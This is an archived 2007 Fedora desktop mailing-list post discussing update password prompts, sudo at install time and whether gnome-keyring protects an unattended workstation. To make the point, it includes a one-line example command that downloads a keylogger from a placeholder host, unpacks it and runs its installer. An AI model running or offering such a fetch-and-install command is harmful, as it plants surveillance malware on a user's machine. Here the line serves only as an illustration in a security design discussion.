low-hanging fruit

Colin Walters walters at redhat.com
Mon Aug 20 17:26:35 UTC 2007

On 8/20/07, Jesse Keating <jkeating at redhat.com> wrote:
> On Mon, 20 Aug 2007 12:02:56 -0400
> "Colin Walters" <walters at redhat.com> wrote:
> > Ok, here is where we need to frame the discussion.  The scenario I am
> > thinking of is a Fedora spin that is in the "XP/OS X" category.
> Not really helpful here, but OS X does prompt you for your password
> when installing updates.  Presumably so that they can do some sudo
> action behind the scenes to apply said updates.  I'm comfortable with
> this, especially if we go down the road of adding the first user to
> sudo at install time.

That is interesting; I honestly haven't used OS X at all.  Does OS X also
have a password on your account by default, or did you have to explicitly
set one?

Does gnome-keyring have a sensible timeout?  If I left my workstation
> for a period of time and forgot to enable the screensaver, can anybody
> access my keyring contents, or cause something to be authenticated via
> my keyring?

Unrelated but - in my opinion gnome-keyring adds very little in terms of
security to this scenario.

wget http://my.favorite.keylogger.example.com/linux-x86.tgz && tar xzvf
*.tgz && sh keylogger/install.sh
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.fedoraproject.org/pipermail/desktop/attachments/20070820/9aa44936/attachment.html 

More information about the desktop mailing list